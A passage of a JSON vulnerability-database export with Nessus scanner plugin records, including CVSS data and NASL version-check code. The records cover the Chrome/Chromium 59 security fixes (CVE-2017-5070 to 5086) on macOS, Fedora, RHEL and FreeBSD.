An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-5077)\n\n - An unspecified flaw exists in the mailto handling functionality that allows an unauthenticated, remote attacker to inject arbitrary commands. (CVE-2017-5078)\n\n - An unspecified flaw exists in Blink that allows an attacker to spoof components in the user interface.\n (CVE-2017-5079)\n\n - A use-after-free free error exists in the credit card autofill functionality that allows an attacker to have an unspecified impact. (CVE-2017-5080)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to bypass extension verification mechanisms. (CVE-2017-5081)\n\n - An unspecified flaw exists in the credit card editor view functionality that allows an unauthenticated, remote attacker to disclose credit card information.\n (CVE-2017-5082)\n\n - An unspecified flaw exists in the WebUI pages component that allows an unauthenticated, remote attacker to execute arbitrary JavaScript code. 
(CVE-2017-5085)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-08T00:00:00", "type": "nessus", "title": "Google Chrome < 59.0.3071.86 Multiple Vulnerabilities (macOS)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_59_0_3071_86.NASL", "href": "https://www.tenable.com/plugins/nessus/100680", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100680);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n 
\"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_bugtraq_id(98861);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 59.0.3071.86 Multiple Vulnerabilities (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 59.0.3071.86. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A type confusion error exists in the Google V8 component\n that allows an unauthenticated, remote attacker to\n execute arbitrary code. (CVE-2017-5070)\n\n - An out-of-bounds read error exists in the Google V8\n component that allows an unauthenticated, remote\n attacker to cause a denial of service condition or the\n disclosure of sensitive information. (CVE-2017-5071)\n\n - Multiple unspecified flaws exist in the Omnibox\n component that allows an attacker to spoof the address\n in the address bar. (CVE-2017-5072, CVE-2017-5076,\n CVE-2017-5083, CVE-2017-5086)\n\n - A use-after-free error exists in the print preview\n functionality that allows an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2017-5073)\n\n - A use-after-free error exists in the Apps Bluetooth\n component that allows an unauthenticated, remote\n attacker to execute arbitrary code. 
(CVE-2017-5074)\n\n - An unspecified flaw exists in the CSP reporting\n component that allows an unauthenticated, remote\n attacker to disclose sensitive information.\n (CVE-2017-5075)\n\n - An overflow condition exists in the Google Skia\n component due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-5077)\n\n - An unspecified flaw exists in the mailto handling\n functionality that allows an unauthenticated, remote\n attacker to inject arbitrary commands. (CVE-2017-5078)\n\n - An unspecified flaw exists in Blink that allows an\n attacker to spoof components in the user interface.\n (CVE-2017-5079)\n\n - A use-after-free free error exists in the credit card\n autofill functionality that allows an attacker to have\n an unspecified impact. (CVE-2017-5080)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to bypass extension\n verification mechanisms. (CVE-2017-5081)\n\n - An unspecified flaw exists in the credit card editor\n view functionality that allows an unauthenticated,\n remote attacker to disclose credit card information.\n (CVE-2017-5082)\n\n - An unspecified flaw exists in the WebUI pages component\n that allows an unauthenticated, remote attacker to\n execute arbitrary JavaScript code. 
(CVE-2017-5085)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dde93a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 59.0.3071.86 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'59.0.3071.86', severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:28:56", "description": "Chromium 59. Add smaller logo files. Fix lots of security bugs:\nSecurity fix for CVE-2017-5070, CVE-2017-5071, CVE-2017-5072, CVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5086, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5080, CVE-2017-5081, CVE-2017-5082, CVE-2017-5083, CVE-2017-5085\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "Fedora 25 : 1:chromium-native_client (2017-a66e2c5b62)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:chromium-native_client", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-A66E2C5B62.NASL", "href": "https://www.tenable.com/plugins/nessus/101124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a66e2c5b62.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101124);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-a66e2c5b62\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 25 : 1:chromium-native_client (2017-a66e2c5b62)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chromium 59. Add smaller logo files. 
Fix lots of security bugs:\nSecurity fix for CVE-2017-5070, CVE-2017-5071, CVE-2017-5072,\nCVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5086,\nCVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079,\nCVE-2017-5080, CVE-2017-5081, CVE-2017-5082, CVE-2017-5083,\nCVE-2017-5085\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a66e2c5b62\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected 1:chromium-native_client package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:chromium-native_client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"chromium-native_client-59.0.3071.86-1.20170607gitaac1de2.fc25\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:chromium-native_client\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:29:26", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 59.0.3071.86.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2017-5070, CVE-2017-5071, CVE-2017-5072, CVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5080, CVE-2017-5081, CVE-2017-5086, CVE-2017-5082, CVE-2017-5083, CVE-2017-5085)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2017:1399)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", 
"CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2017-1399.NASL", "href": "https://www.tenable.com/plugins/nessus/100660", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1399. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100660);\n script_version(\"3.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"RHSA\", value:\"2017:1399\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2017:1399)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 59.0.3071.86.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2017-5070, CVE-2017-5071,\nCVE-2017-5072, CVE-2017-5073, CVE-2017-5074, CVE-2017-5075,\nCVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079,\nCVE-2017-5080, CVE-2017-5081, CVE-2017-5086, CVE-2017-5082,\nCVE-2017-5083, CVE-2017-5085)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://chromereleases.googleblog.com/2017/06/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:1399\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5070\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5071\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5073\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5074\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5076\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5077\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://access.redhat.com/security/cve/cve-2017-5078\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5079\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5080\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5081\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5082\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5083\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5085\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5086\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1399\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-59.0.3071.86-1.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-59.0.3071.86-1.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-59.0.3071.86-1.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-59.0.3071.86-1.el6_9\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:28:04", "description": "Google Chrome releases reports :\n\n30 security fixes in this release\n\nPlease reference CVE/URL 
list for details", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (52f4b48b-4ac3-11e7-99aa-e8e0b747a45a)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_52F4B48B4AC311E799AAE8E0B747A45A.NASL", "href": "https://www.tenable.com/plugins/nessus/100646", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, 
PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 